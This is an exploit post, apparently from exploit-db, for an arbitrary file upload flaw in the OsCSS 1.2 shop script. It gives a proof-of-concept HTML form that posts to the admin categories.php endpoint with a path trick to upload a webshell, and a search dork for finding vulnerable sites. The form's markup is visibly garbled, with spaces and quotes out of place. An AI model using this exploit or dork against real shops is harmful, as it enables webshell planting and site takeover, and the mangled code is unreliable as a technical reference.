OsCSS is an open-source online shop script system. OsCSS 1.2 Has the Arbitrary File Upload Vulnerability, which may allow attackers to upload webshells.
[+] Info:
~~~~~~~~~
# Exploit Title: OsCSS Remote File Upload Exploit
# Date: 12-1-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform/Tested on: Windows XP SP2 DE & Ubuntu 10.10
# Category: webapps/0day
# Dork: inurl: "sorry scriptkiddies"
# Contact: shichemt@hotmail.com-http://www.shichemt-alen.com/
[+] Poc:
~~~~~~~~~
View sourceprint? 1
2 <br> <u> Upload Shell: </u> <br>
3 <form name = "file" action = "http: // localhost/admin/categories. php/login. php? Action = insert_category & cPath = "method =" post "enctype =" multipart/form-data ">
4 <input type = "file" name = "categories_image"> <br>
5 <input name = "submit" type = "submit" value = "Upload">
6 </form>
7 <center>
8 <a href = "Shichemt-Alen> http://www.shichemt-alen.com/"> Shichemt-Alen©</A> 2010
9 </center>
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15651